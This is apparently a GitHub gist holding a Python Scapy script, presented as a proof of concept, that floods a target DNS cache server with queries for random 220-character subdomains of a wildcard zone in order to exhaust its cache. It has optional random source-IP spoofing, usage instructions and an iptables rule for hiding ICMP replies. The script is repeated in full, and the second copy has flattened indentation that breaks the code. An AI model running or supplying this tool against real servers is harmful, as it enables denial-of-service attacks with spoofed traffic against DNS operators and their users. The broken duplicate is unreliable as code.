sipherr/gist:1b4246bc7f1fc087665e

## gistfile1.py
    # DNS wildcard attack POC (cache busting?)
    #
    # DNS Server pwnage from a single host. This tool will clobber a DNS cache server.
    #
    # Theory
    # Force a cache server to cache records for a DNS zone that will answer for non-existant domain names..  http://en.wikipedia.org/wiki/Wildcard_DNS_record
    #
    # Example: *.godaddy.com
    #
    # Running on Ubuntu
    # apt-get install python-scapy
    #
    # Make sure to drop ICMP Unreachable if not spoofing. Since we are not using the system connect() functions the kernel will ICMP unreach to victim (which may or may not impact the results of the attack).
    #
    # iptables -I OUTPUT -p icmp --icmp-type destination-unreachable -j DROP
    #
    # As root
    # Example usage: python dnsb.py ns1.target.com 3.1.33.7 godaddy.com 10000 0
    #
    # BIND 9 default max cache ttl is 7 days.
    # max-cache-ttl sets the maximum time (in seconds) for which the server will cache positive answers (negative answers NXDOMAIN is defined by max-ncache-ttl). The default is one week (7 days). This statement may be used in view or a global options clause.


    from scapy.all import *
    import random
    import string
    import sys

    # inet_ntoa
    import socket
    import struct


    # Maximum subdomain lenght..consumes more memory in the cache.
    # This subdivision can go down to 127 levels deep, and each DNS label can contain up to 63 characters, as long as the whole domain name does not exceed a total length of 255 characters.
    def randomain(size=220, chars=string.letters + string.digits):
            return ''.join(random.choice(chars) for _ in range(size))

    if(os.getuid())!=0:
        print "ERROR: Must be root to use raw sockets."
        sys.exit(1)

    if (len(sys.argv) != 6):
            print "DNS Cache Busting attack Proof of concept"
            print "Usage: " + sys.argv[0] + " < target > < source > < wild card domain > < number of packets > < spoof 0 = off / 1 = on >"
            quit()


    target=sys.argv[1]
    source=sys.argv[2]
    dlist=sys.argv[3]
    num=int(sys.argv[4])
    spoof=int(sys.argv[5])


    # get local IP excluding loopback. A bit misleading, google's cache plays no part in the attack.
    myip=([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1])

    print "Sending packets to: "+target

    for x in range(0, num):

            # If we want to spoof?
            if spoof == 1:
                    randsource=socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
                    myip=randsource
                    print myip

            # generate random sub domain
            rdom=randomain()
            rd= rdom + '.' + dlist

            # send out packets :)
            req = IP(dst=target,src=myip)/UDP(sport=random.randint(1025, 65000), dport=53)/DNS(id=random.randint(1025, 65000), opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,qd=DNSQR(qname=rd, qtype=1, qclass=1),an=0,ns=0,ar=0)
            send(req)
	# DNS wildcard attack POC (cache busting?)
	#
	# DNS Server pwnage from a single host. This tool will clobber a DNS cache server.
	#
	# Theory
	# Force a cache server to cache records for a DNS zone that will answer for non-existant domain names.. http://en.wikipedia.org/wiki/Wildcard_DNS_record
	#
	# Example: *.godaddy.com
	#
	# Running on Ubuntu
	# apt-get install python-scapy
	#
	# Make sure to drop ICMP Unreachable if not spoofing. Since we are not using the system connect() functions the kernel will ICMP unreach to victim (which may or may not impact the results of the attack).
	#
	# iptables -I OUTPUT -p icmp --icmp-type destination-unreachable -j DROP
	#
	# As root
	# Example usage: python dnsb.py ns1.target.com 3.1.33.7 godaddy.com 10000 0
	#
	# BIND 9 default max cache ttl is 7 days.
	# max-cache-ttl sets the maximum time (in seconds) for which the server will cache positive answers (negative answers NXDOMAIN is defined by max-ncache-ttl). The default is one week (7 days). This statement may be used in view or a global options clause.


	from scapy.all import *
	import random
	import string
	import sys

	# inet_ntoa
	import socket
	import struct


	# Maximum subdomain lenght..consumes more memory in the cache.
	# This subdivision can go down to 127 levels deep, and each DNS label can contain up to 63 characters, as long as the whole domain name does not exceed a total length of 255 characters.
	def randomain(size=220, chars=string.letters + string.digits):
	return ''.join(random.choice(chars) for _ in range(size))

	if(os.getuid())!=0:
	print "ERROR: Must be root to use raw sockets."
	sys.exit(1)

	if (len(sys.argv) != 6):
	print "DNS Cache Busting attack Proof of concept"
	print "Usage: " + sys.argv[0] + " < target > < source > < wild card domain > < number of packets > < spoof 0 = off / 1 = on >"
	quit()


	target=sys.argv[1]
	source=sys.argv[2]
	dlist=sys.argv[3]
	num=int(sys.argv[4])
	spoof=int(sys.argv[5])


	# get local IP excluding loopback. A bit misleading, google's cache plays no part in the attack.
	myip=([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1])

	print "Sending packets to: "+target

	for x in range(0, num):

	# If we want to spoof?
	if spoof == 1:
	randsource=socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
	myip=randsource
	print myip

	# generate random sub domain
	rdom=randomain()
	rd= rdom + '.' + dlist

	# send out packets :)
	req = IP(dst=target,src=myip)/UDP(sport=random.randint(1025, 65000), dport=53)/DNS(id=random.randint(1025, 65000), opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,qd=DNSQR(qname=rd, qtype=1, qclass=1),an=0,ns=0,ar=0)
	send(req)